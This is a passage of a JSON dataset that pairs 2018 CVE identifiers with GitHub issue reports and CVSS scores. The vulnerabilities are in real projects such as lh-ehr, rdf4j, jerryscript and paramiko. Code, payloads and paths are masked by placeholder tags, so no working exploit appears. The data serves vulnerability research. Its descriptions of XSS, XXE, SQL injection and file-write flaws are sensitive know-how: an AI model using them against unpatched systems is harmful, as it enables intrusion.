  17051. "description": "History page parses and renders html tags. While visiting this page URLTAG which has an html input element as it's title ( APITAG ), I noticed that it got parsed like HTML and actually displays the rendered element in the PATHTAG page, whereas expected/desired behavoir would be the website title being displayed in plain text. I then searched a bunch of unclosed html tags in google, a APITAG and an APITAG . The NUMBERTAG topmost items in this screenshot show that it all get's evaluated: FILETAG Version Information: URLTAG",
  17052. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17053. "severity": "MEDIUM",
  17054. "baseScore": 6.1,
  17055. "impactScore": 2.7,
  17056. "exploitabilityScore": 2.8
  17057. },
  17058. {
  17059. "CVE_ID": "CVE-2018-1000620",
  17060. "Issue_Url_old": "https://github.com/hapijs/cryptiles/issues/34",
  17061. "Issue_Url_new": "https://github.com/hapijs/cryptiles/issues/34",
  17062. "Repo_new": "hapijs/cryptiles",
  17063. "Issue_Created_At": "2018-06-24T04:05:37Z",
  17064. "description": "APITAG generates biased random digits. Reported by Microsoft Vulnerability Research: MSVR NUMBERTAG The APITAG method generates digits that lack a perfect distribution over enough attempts.",
  17065. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17066. "severity": "CRITICAL",
  17067. "baseScore": 9.8,
  17068. "impactScore": 5.9,
  17069. "exploitabilityScore": 3.9
  17070. },
  17071. {
  17072. "CVE_ID": "CVE-2018-1000636",
  17073. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2435",
  17074. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2435",
  17075. "Repo_new": "jerryscript-project/jerryscript",
  17076. "Issue_Created_At": "2018-07-24T09:16:56Z",
  17077. "description": "Null pointer dereference in jmem heap. Jerry Version: f NUMBERTAG d NUMBERTAG Build command: APITAG OS: Ubuntu NUMBERTAG Test case: APITAG Result: ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG bc1 bp NUMBERTAG sp NUMBERTAG fff3cb1ba NUMBERTAG T NUMBERTAG bc0 in jmem_heap_free_block PATHTAG NUMBERTAG PATHTAG NUMBERTAG in ecma_builtin_dispatch_routine PATHTAG NUMBERTAG in ecma_builtin_dispatch_call PATHTAG NUMBERTAG in ecma_op_function_call PATHTAG NUMBERTAG f5 in opfunc_call PATHTAG NUMBERTAG f5 in vm_execute PATHTAG NUMBERTAG fda in vm_run PATHTAG NUMBERTAG in vm_run_eval PATHTAG NUMBERTAG in ecma_op_eval_chars_buffer PATHTAG NUMBERTAG f in jerry_eval PATHTAG NUMBERTAG f in main jerry main/main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG jmem_heap_free_block NUMBERTAG ABORTING Immediate cause: It seems that this bug is caused by triggering undefined behavior at PATHTAG The second passed argument is NULL. This causes NULL dereference and allows GCC to optimize out subsequent checks for NULL. This further causes writing to null pointer, which results in a segmentation fault. Note, that because this bug occurs due to gcc optimizing out a check for NULL, this may not be reproducible with a debug build. Please confirm if you can reproduce this issue. This bug was discovered by Marcin Dominiak and Wojciech Rauner.",
  17078. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  17079. "severity": "MEDIUM",
  17080. "baseScore": 6.5,
  17081. "impactScore": 3.6,
  17082. "exploitabilityScore": 2.8
  17083. },
  17084. {
  17085. "CVE_ID": "CVE-2018-1000638",
  17086. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/20",
  17087. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/20",
  17088. "Repo_new": "bg5sbk/minicms",
  17089. "Issue_Created_At": "2018-08-03T10:10:25Z",
  17090. "description": "APITAG reflective XSS in PATHTAG This is a reflective XSS vulnerability poc : GET PATHTAG NUMBERTAG E NUMBERTAG Ca NUMBERTAG E HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Cookie: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Cache Control: max age NUMBERTAG reason : FILETAG result : FILETAG",
  17091. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17092. "severity": "MEDIUM",
  17093. "baseScore": 6.1,
  17094. "impactScore": 2.7,
  17095. "exploitabilityScore": 2.8
  17096. },
  17097. {
  17098. "CVE_ID": "CVE-2018-1000639",
  17099. "Issue_Url_old": "https://github.com/arnobl/latexdraw/issues/10",
  17100. "Issue_Url_new": "https://github.com/latexdraw/latexdraw/issues/10",
  17101. "Repo_new": "latexdraw/latexdraw",
  17102. "Issue_Created_At": "2018-07-18T13:07:14Z",
  17103. "description": "XXE in SVG Parsing. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occured The following code snippet sets an SVG Entity resolver and parses the SVG file retrieved from the URL: URLTAG To exploit this issue, create an SVG file with the following code: APITAG",
  17104. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  17105. "severity": "CRITICAL",
  17106. "baseScore": 9.6,
  17107. "impactScore": 6.0,
  17108. "exploitabilityScore": 2.8
  17109. },
  17110. {
  17111. "CVE_ID": "CVE-2018-1000640",
  17112. "Issue_Url_old": "https://github.com/villagedefrance/OpenCart-Overclocked/issues/190",
  17113. "Issue_Url_new": "https://github.com/villagedefrance/opencart-overclocked/issues/190",
  17114. "Repo_new": "villagedefrance/opencart-overclocked",
  17115. "Issue_Created_At": "2018-07-18T13:19:30Z",
  17116. "description": "Reflected XSS in APITAG Template. The Issue Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim's browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. Where the Issue Occured The following code shows that the APITAG variable is reflected to the victim's browser without any input validation, leading to reflected XSS: URLTAG An example payload for the token variable is given below: APITAG",
  17117. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17118. "severity": "MEDIUM",
  17119. "baseScore": 6.1,
  17120. "impactScore": 2.7,
  17121. "exploitabilityScore": 2.8
  17122. },
  17123. {
  17124. "CVE_ID": "CVE-2018-1000641",
  17125. "Issue_Url_old": "https://github.com/YesWiki/yeswiki/issues/356",
  17126. "Issue_Url_new": "https://github.com/yeswiki/yeswiki/issues/356",
  17127. "Repo_new": "yeswiki/yeswiki",
  17128. "Issue_Created_At": "2018-07-19T09:39:08Z",
  17129. "description": "PHP Objection Injection. The Issue PHP Object Deserialization Injection attacks utilise the unserialize function within PHP. The deserialisation of the PHP object can trigger certain methods within the object, allowing the attacker to perform unauthorised actions like execution of code, disclosure of information, etc. Where the Issue Occurred Displayed below is the code within the APITAG project containing the vulnerable code: URLTAG",
  17130. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17131. "severity": "CRITICAL",
  17132. "baseScore": 9.8,
  17133. "impactScore": 5.9,
  17134. "exploitabilityScore": 3.9
  17135. },
  17136. {
  17137. "CVE_ID": "CVE-2018-1000642",
  17138. "Issue_Url_old": "https://github.com/Ysurac/FlightAirMap/issues/410",
  17139. "Issue_Url_new": "https://github.com/ysurac/flightairmap/issues/410",
  17140. "Repo_new": "ysurac/flightairmap",
  17141. "Issue_Created_At": "2018-07-19T09:49:30Z",
  17142. "description": "Reflected XSS in FILETAG . The Issue Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim's browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. Where the Issue Occurred The following code shows that the APITAG variable is reflected to the victim's browser without any input validation, leading to reflected XSS: URLTAG An example payload for the registration variable is given below: ERRORTAG",
  17143. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17144. "severity": "MEDIUM",
  17145. "baseScore": 6.1,
  17146. "impactScore": 2.7,
  17147. "exploitabilityScore": 2.8
  17148. },
  17149. {
  17150. "CVE_ID": "CVE-2018-1000644",
  17151. "Issue_Url_old": "https://github.com/eclipse/rdf4j/issues/1056",
  17152. "Issue_Url_new": "https://github.com/eclipse/rdf4j/issues/1056",
  17153. "Repo_new": "eclipse/rdf4j",
  17154. "Issue_Created_At": "2018-07-19T11:45:15Z",
  17155. "description": "XXE in XML Parser. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without disabling entities: URLTAG URLTAG",
  17156. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17157. "severity": "CRITICAL",
  17158. "baseScore": 10.0,
  17159. "impactScore": 6.0,
  17160. "exploitabilityScore": 3.9
  17161. },
  17162. {
  17163. "CVE_ID": "CVE-2018-1000645",
  17164. "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1210",
  17165. "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1210",
  17166. "Repo_new": "librehealthio/lh-ehr",
  17167. "Issue_Created_At": "2018-07-23T11:35:05Z",
  17168. "description": "Authenticated Local File Disclosure in FILETAG . The Issue Local file disclosure is a vulnerability which allows an attacker to disclose the contents of files on the server. An attacker can use this vulnerability to disclose the contents of sensitive files like APITAG , config files, etc. In lh ehr, an attacker must be authenticated to perform this attack. Should the attacker know the path to a file and the web server user has sufficient access to read the file, the contents of the file will be echoed in the page. Where the Issue Occurred The following code snippet displays the usage of the APITAG function in PHP within the lh ehr application: URLTAG",
  17169. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  17170. "severity": "MEDIUM",
  17171. "baseScore": 6.5,
  17172. "impactScore": 3.6,
  17173. "exploitabilityScore": 2.8
  17174. },
  17175. {
  17176. "CVE_ID": "CVE-2018-1000646",
  17177. "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1211",
  17178. "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1211",
  17179. "Repo_new": "librehealthio/lh-ehr",
  17180. "Issue_Created_At": "2018-07-23T11:42:50Z",
  17181. "description": "Authenticated Unrestricted File Write in FILETAG . The Issue Unrestricted file write vulnerabilities allow attackers to write file such as PHP files, in locations where the web server user has access to write. This may allow an attacker to write files with malicious content and may lead to remote code execution Where the Issue Occurred The following code snippet displays the usage of the APITAG function in PHP within the lh ehr application: URLTAG",
  17182. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17183. "severity": "HIGH",
  17184. "baseScore": 8.8,
  17185. "impactScore": 5.9,
  17186. "exploitabilityScore": 2.8
  17187. },
  17188. {
  17189. "CVE_ID": "CVE-2018-1000647",
  17190. "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1212",
  17191. "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1212",
  17192. "Repo_new": "librehealthio/lh-ehr",
  17193. "Issue_Created_At": "2018-07-23T11:49:10Z",
  17194. "description": "Authenticated Unrestricted File Deletion . The Issue Unrestricted file deletion vulnerabilities are caused by overly trusting a user's input and allowing the user to manipulate the path of the file to be deleted. This may allow an attacker to create a denial of service scenario. An attacker must be authenticated to perform this attack. Where the Issue Occurred The following code snippet displays the usage of the ERRORTAG function in PHP within the lh ehr application: URLTAG",
  17195. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
  17196. "severity": "HIGH",
  17197. "baseScore": 7.1,
  17198. "impactScore": 4.2,
  17199. "exploitabilityScore": 2.8
  17200. },
  17201. {
  17202. "CVE_ID": "CVE-2018-1000648",
  17203. "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1213",
  17204. "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1213",
  17205. "Repo_new": "librehealthio/lh-ehr",
  17206. "Issue_Created_At": "2018-07-23T11:57:29Z",
  17207. "description": "Authenticated Unrestricted File Write in FILETAG . The Issue Unrestricted file write vulnerabilities allow attackers to write file such as PHP files, in locations where the web server user has access to write. This may allow an attacker to write files with malicious content and may lead to remote code execution. An attacker must be authenticated to perform this attack. Where the Issue Occurred The following code snippet displaya the usage of the fopen function in PHP within the lh ehr application: URLTAG This creates or overwrites a file that the web server user has access to. The following code snippet displays writing user controlled content within the user controlled file: URLTAG",
  17208. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17209. "severity": "HIGH",
  17210. "baseScore": 8.8,
  17211. "impactScore": 5.9,
  17212. "exploitabilityScore": 2.8
  17213. },
  17214. {
  17215. "CVE_ID": "CVE-2018-1000649",
  17216. "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1214",
  17217. "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1214",
  17218. "Repo_new": "librehealthio/lh-ehr",
  17219. "Issue_Created_At": "2018-07-23T12:10:18Z",
  17220. "description": "Authenticated Unrestricted File Write in FILETAG NUMBERTAG The Issue Unrestricted file write vulnerabilities allow attackers to write file such as PHP files, in locations where the web server user has access to write. This may allow an attacker to write files with malicious content and may lead to remote code execution. An attacker must be authenticated to perform this attack. Where the Issue Occurred The following code snippet displays the usage of the fopen function in PHP within the lh ehr application: URLTAG This creates or overwrites a file that the web server user has access to. The following code snippet displays writing user controlled content within the user controlled file: URLTAG",
  17221. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17222. "severity": "HIGH",
  17223. "baseScore": 8.8,
  17224. "impactScore": 5.9,
  17225. "exploitabilityScore": 2.8
  17226. },
  17227. {
  17228. "CVE_ID": "CVE-2018-1000650",
  17229. "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1215",
  17230. "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1215",
  17231. "Repo_new": "librehealthio/lh-ehr",
  17232. "Issue_Created_At": "2018-07-23T12:22:06Z",
  17233. "description": "Authenticated SQL Injection in FILETAG . The Issue SQL Injections are vulnerabilities in which the developer overly trusts user controlled input. This allows an attacker to perform malicious queries upon the database, which can lead to compromise of all data within the database and question the integrity of the data. An attacker must be authenticated to perform this attack. Where the Issue Occurred The following code snippet shows the SQL query being created with a tainted variable: URLTAG The following code snippet show the above mentioned SQL query being executed: URLTAG",
  17234. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17235. "severity": "HIGH",
  17236. "baseScore": 8.8,
  17237. "impactScore": 5.9,
  17238. "exploitabilityScore": 2.8
  17239. },
  17240. {
  17241. "CVE_ID": "CVE-2018-1000652",
  17242. "Issue_Url_old": "https://github.com/JabRef/jabref/issues/4229",
  17243. "Issue_Url_new": "https://github.com/jabref/jabref/issues/4229",
  17244. "Repo_new": "jabref/jabref",
  17245. "Issue_Created_At": "2018-07-23T12:31:45Z",
  17246. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippet displays the usage of APITAG without disabling entities: URLTAG The following code snippet displays the parsing of the XML: URLTAG",
  17247. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17248. "severity": "CRITICAL",
  17249. "baseScore": 10.0,
  17250. "impactScore": 6.0,
  17251. "exploitabilityScore": 3.9
  17252. },
  17253. {
  17254. "CVE_ID": "CVE-2018-1000657",
  17255. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/44800",
  17256. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/44800",
  17257. "Repo_new": "rust-lang/rust",
  17258. "Issue_Created_At": "2017-09-24T00:57:53Z",
  17259. "description": "seg fault pushing on either side of a APITAG I've been seeing lots of bad behavior trying to use APITAG I've boiled it down to a relatively simple example which shows some of the bad behavior I was seeing and additionally seg faults. This was with: rustc NUMBERTAG f3d NUMBERTAG f NUMBERTAG binary: rustc commit hash: APITAG commit date NUMBERTAG host NUMBERTAG apple darwin release NUMBERTAG LLVM version NUMBERTAG and also rust NUMBERTAG The output I expect to see is: > old packet NUMBERTAG pushing D NUMBERTAG FB A8 > new packet NUMBERTAG D NUMBERTAG FB A8 The output I get is: > old packet NUMBERTAG pushing D NUMBERTAG FB A8 > new packet NUMBERTAG FB A8 > Segmentation fault NUMBERTAG Note that the fourth from the last byte should be D9. Work around seems to be to use a large APITAG capacity. Here's the code: CODETAG",
  17260. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17261. "severity": "HIGH",
  17262. "baseScore": 7.8,
  17263. "impactScore": 5.9,
  17264. "exploitabilityScore": 1.8
  17265. },
  17266. {
  17267. "CVE_ID": "CVE-2018-1000660",
  17268. "Issue_Url_old": "https://github.com/tock/tock/issues/1147",
  17269. "Issue_Url_new": "https://github.com/tock/tock/issues/1147",
  17270. "Repo_new": "tock/tock",
  17271. "Issue_Created_At": "2018-08-07T18:27:40Z",
  17272. "description": "Package name can potentially access all flash and ram. I haven't written code that exploits the bug yet, so it is just a theoretical bug. Summary If you are using a TBF version NUMBERTAG there is no check on the length of the package name, so it could be as large as all the flash memory available. Since the package name is public, every capsule could have unrestricted read access to all memory, using only safe code. Exploiting the bug There are two ways of exploiting the bug: One could create a User process using a APITAG with an arbitrary large package name length, and later on a Capsule could use its package name to read arbitrary memory. Or, a capsule could call the safe function \"get_package_name\" with a raw pointer that points to a fake TBF version NUMBERTAG header and use it to read the data anywhere by using the package name offset and length. Code: Inside process.rs lines NUMBERTAG APITAG Now lines NUMBERTAG and NUMBERTAG inside the function create: APITAG And at last, inside the function APITAG ERRORTAG There are no checks for either pkg_name_offset nor pkg_name_size. Proposed solutions First the APITAG should probably be made unsafe, and then either some package name size check should be placed (either in the get package name function, or in the parse_and_validate_tbf_header function) or the support for NUMBERTAG header should be dropped.",
  17273. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  17274. "severity": "HIGH",
  17275. "baseScore": 7.5,
  17276. "impactScore": 3.6,
  17277. "exploitabilityScore": 3.9
  17278. },
  17279. {
  17280. "CVE_ID": "CVE-2018-1000666",
  17281. "Issue_Url_old": "https://github.com/0-complexity/openvcloud/issues/1207",
  17282. "Issue_Url_new": "https://github.com/0-complexity/openvcloud/issues/1207",
  17283. "Repo_new": "0-complexity/openvcloud",
  17284. "Issue_Created_At": "2018-01-16T19:45:44Z",
  17285. "description": "Some weird feature in portal make portal crash. Detailed description Try to figure out what procued undeneath stacktrace Steps to reproduce ? Relevant stacktraces CODETAG",
  17286. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17287. "severity": "CRITICAL",
  17288. "baseScore": 9.8,
  17289. "impactScore": 5.9,
  17290. "exploitabilityScore": 3.9
  17291. },
  17292. {
  17293. "CVE_ID": "CVE-2018-1000667",
  17294. "Issue_Url_old": "https://github.com/cyrillos/nasm/issues/3",
  17295. "Issue_Url_new": "https://github.com/cyrillos/nasm/issues/3",
  17296. "Repo_new": "cyrillos/nasm",
  17297. "Issue_Created_At": "2018-08-22T14:10:55Z",
  17298. "description": "crash found by fuzzing. I fuzzing the nasm using smart fuzzer, and find a crash of nasm. The crash info is as follow: ERRORTAG I debug the program, and the crash is caused by function assemble_file(inname, depend_ptr) at APITAG Please check it. The POC is in the attachment. FILETAG",
  17299. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  17300. "severity": "MEDIUM",
  17301. "baseScore": 5.5,
  17302. "impactScore": 3.6,
  17303. "exploitabilityScore": 1.8
  17304. },
  17305. {
  17306. "CVE_ID": "CVE-2018-1000671",
  17307. "Issue_Url_old": "https://github.com/sympa-community/sympa/issues/268",
  17308. "Issue_Url_new": "https://github.com/sympa-community/sympa/issues/268",
  17309. "Repo_new": "sympa-community/sympa",
  17310. "Issue_Created_At": "2018-04-16T08:00:42Z",
  17311. "description": "Possible XSS. The following link redirects to bing: URLTAG It also works in NUMBERTAG We have no newer sympa to test with. It seems to me maybe this is a bug in a perl dependency? I couldn't find \"referer\" directly in sympa's source code during a (very) cursory grep.",
  17312. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17313. "severity": "MEDIUM",
  17314. "baseScore": 6.1,
  17315. "impactScore": 2.7,
  17316. "exploitabilityScore": 2.8
  17317. },
  17318. {
  17319. "CVE_ID": "CVE-2018-1000800",
  17320. "Issue_Url_old": "https://github.com/zephyrproject-rtos/zephyr/issues/7638",
  17321. "Issue_Url_new": "https://github.com/zephyrproject-rtos/zephyr/issues/7638",
  17322. "Repo_new": "zephyrproject-rtos/zephyr",
  17323. "Issue_Created_At": "2018-05-17T20:10:19Z",
  17324. "description": "get FAULT when fuzzing sys_ring_buf_ put and sys_ring_bug_get APIs. I am trying to fuzzing the kernel APIs, and I wrote a simple application to call the APIs: sys_ring_buf_put and sys_ring_buf_get. the code is as below CODETAG when I run the application, it result in USEAGE FAULT as following: CODETAG Should zephyr add some checks like type and bound check in the implementation of syscall API code ?",
  17325. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17326. "severity": "CRITICAL",
  17327. "baseScore": 9.8,
  17328. "impactScore": 5.9,
  17329. "exploitabilityScore": 3.9
  17330. },
  17331. {
  17332. "CVE_ID": "CVE-2018-1000804",
  17333. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/594",
  17334. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/594",
  17335. "Repo_new": "contiki-ng/contiki-ng",
  17336. "Issue_Created_At": "2018-07-09T14:57:04Z",
  17337. "description": "Stack based buffer overflow while parsing AQL (parsing next token). Function next_token that provides next token during AQL parsing tries to memcpy input data (part of AQL files) into fixed size buffer. Allocated buffer can fit only DB_MAX_ELEMENT_SIZE NUMBERTAG bytes and the check is missing. Crash line: aql APITAG Declaration of buffer: APITAG typedef char value_t[DB_MAX_ELEMENT_SIZE]; APITAG define DB_MAX_ELEMENT_SIZE NUMBERTAG APITAG value_t value; aql APITAG NUMBERTAG int lexer_start(lexer_t lexer, char input, token_t token, value_t value) { lexer >input = input; lexer >prev_pos = input; lexer >token = token; lexer >value = value; Overflow: aql APITAG memcpy(lexer >value, s, length); This could lead to Remote Code Execution via stack smashing attack (overwriting the function return address). The risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG critical) Following AQL code will trigger crash APITAG APITAG Mitigation : The size of input token should be limited to DB_MAX_ELEMENT_SIZE. Please take a look at patch fixing this issue in APITAG (using antelope engine as arastorage): URLTAG Crash details using Address Sanitizer: APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffc6d2ca NUMBERTAG at pc NUMBERTAG f1b NUMBERTAG c NUMBERTAG bp NUMBERTAG ffc6d2ca NUMBERTAG sp NUMBERTAG ffc6d2c9a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffc6d2ca NUMBERTAG thread T NUMBERTAG f1b NUMBERTAG c NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG c NUMBERTAG in next_token PATHTAG NUMBERTAG c NUMBERTAG in lexer_next PATHTAG NUMBERTAG in aql_parse PATHTAG NUMBERTAG c1 in main PATHTAG NUMBERTAG f1b NUMBERTAG d8a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffc6d2ca NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG f in aql_parse PATHTAG This frame has NUMBERTAG object(s NUMBERTAG token NUMBERTAG le NUMBERTAG name NUMBERTAG alue' APITAG NUMBERTAG da NUMBERTAG f4 f4 f2 f2 f2 f NUMBERTAG f4]f4 f3 f3 f3 f NUMBERTAG da NUMBERTAG f1 f1 f1 f NUMBERTAG da NUMBERTAG a NUMBERTAG da NUMBERTAG b NUMBERTAG f4 f4 f4 f3 f NUMBERTAG da NUMBERTAG c0: f3 f NUMBERTAG da NUMBERTAG d NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  17338. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17339. "severity": "CRITICAL",
  17340. "baseScore": 9.8,
  17341. "impactScore": 5.9,
  17342. "exploitabilityScore": 3.9
  17343. },
  17344. {
  17345. "CVE_ID": "CVE-2018-1000805",
  17346. "Issue_Url_old": "https://github.com/paramiko/paramiko/issues/1283",
  17347. "Issue_Url_new": "https://github.com/paramiko/paramiko/issues/1283",
  17348. "Repo_new": "paramiko/paramiko",
  17349. "Issue_Created_At": "2018-09-06T22:55:57Z",
  17350. "description": "[CVE PENDING] Server side auth vulnerability [DESC TK]. Placeholder for a not yet public security vulnerability on Paramiko's server side ( NOT client side), as reported by Daniel Hoffman of [usd AG URLTAG . I was emailed by the above on APITAG and (due to being on vacation at the time) was only able to review the initial information today APITAG Daniel submitted the following: sample vanilla enough server side code loop (using standard/public API members with no additions besides logging and specification of expected auth mechanisms) sample client side code which exploits the vulnerability in the server (TK) detailed explanation of why the exploit works, with references to parts of Paramiko's server side code recommended fix At time of writing, I have done a cursory read of the code snippets & explanation, and confirmed that the sample code does appear to exhibit the described exploit. Next steps for me: [ ] take up Daniel on his offer to create a CVE; less work for me, but also, a security company has more experience with that process than I do, namely \"any at all\" [ ] double check the details of the vulnerability so that I understand it more deeply [ ] consider whether the suggested fix is valid (it has to do with Paramiko's reuse of code across client/server use cases) [ ] confirm exploit & fix are both valid on NUMBERTAG APITAG (at present I am still considering NUMBERTAG to be pseudo LTS and getting bugfixes, though this will soon cease) and up [ ] test, patch, confirm [ ] changelog entry [ ] merge up to all branches [ ] push & release at once so fix is live [ ] update this ticket with my notes/real description [ ] send a security notice out via Tidelift",
  17351. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17352. "severity": "HIGH",
  17353. "baseScore": 8.8,
  17354. "impactScore": 5.9,
  17355. "exploitabilityScore": 2.8
  17356. },
  17357. {
  17358. "CVE_ID": "CVE-2018-1000809",
  17359. "Issue_Url_old": "https://github.com/privacyidea/privacyidea/issues/1227",
  17360. "Issue_Url_new": "https://github.com/privacyidea/privacyidea/issues/1227",
  17361. "Repo_new": "privacyidea/privacyidea",
  17362. "Issue_Created_At": "2018-09-07T09:02:49Z",
  17363. "description": "Failcounter increments on every token without a PIN when the user= parameter just has a APITAG . The failcounter increments on every token without a PIN when the user= parameter just has a APITAG . In our case this resulted basically in a denial of service of our two factor authentication system, as by default any fail counter over NUMBERTAG will lock the token out. What did you try to do? Have tokens without a PIN; for example, in our setup we have HOTP, TOTP and VASCO tokens without a PIN. Then a request with a user= APITAG will increment the failcounter for all of these tokens. For example with httpie: APITAG Or with curl: APITAG This will return: \" wrong otp value \" and increment all failcounters by NUMBERTAG What outcome did you expect? Since the user= parameter does not match any user in privacyidea with a token, I was expecting it to just deny/drop the request. What outcome did you experience? All token verifications were blocked because all failcounters were incremented to their current max of NUMBERTAG And any valid check would output the following: \"matching NUMBERTAG tokens, Failcounter exceeded\" . Configuration Tested on APITAG NUMBERTAG and NUMBERTAG Debian stable, virtualenv. Extra information I suspect something is wrong in the logic of PATHTAG L NUMBERTAG URLTAG , so that this is matching all tokens without a PIN. Note that the request needs neither a valid user nor a PIN, so a single unauthenticated remote request is enough to lock out every PIN-less token. ERRORTAG",
  17364. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  17365. "severity": "HIGH",
  17366. "baseScore": 7.5,
  17367. "impactScore": 3.6,
  17368. "exploitabilityScore": 3.9
  17369. },
  17370. {
  17371. "CVE_ID": "CVE-2018-1000811",
  17372. "Issue_Url_old": "https://github.com/bludit/bludit/issues/812",
  17373. "Issue_Url_new": "https://github.com/bludit/bludit/issues/812",
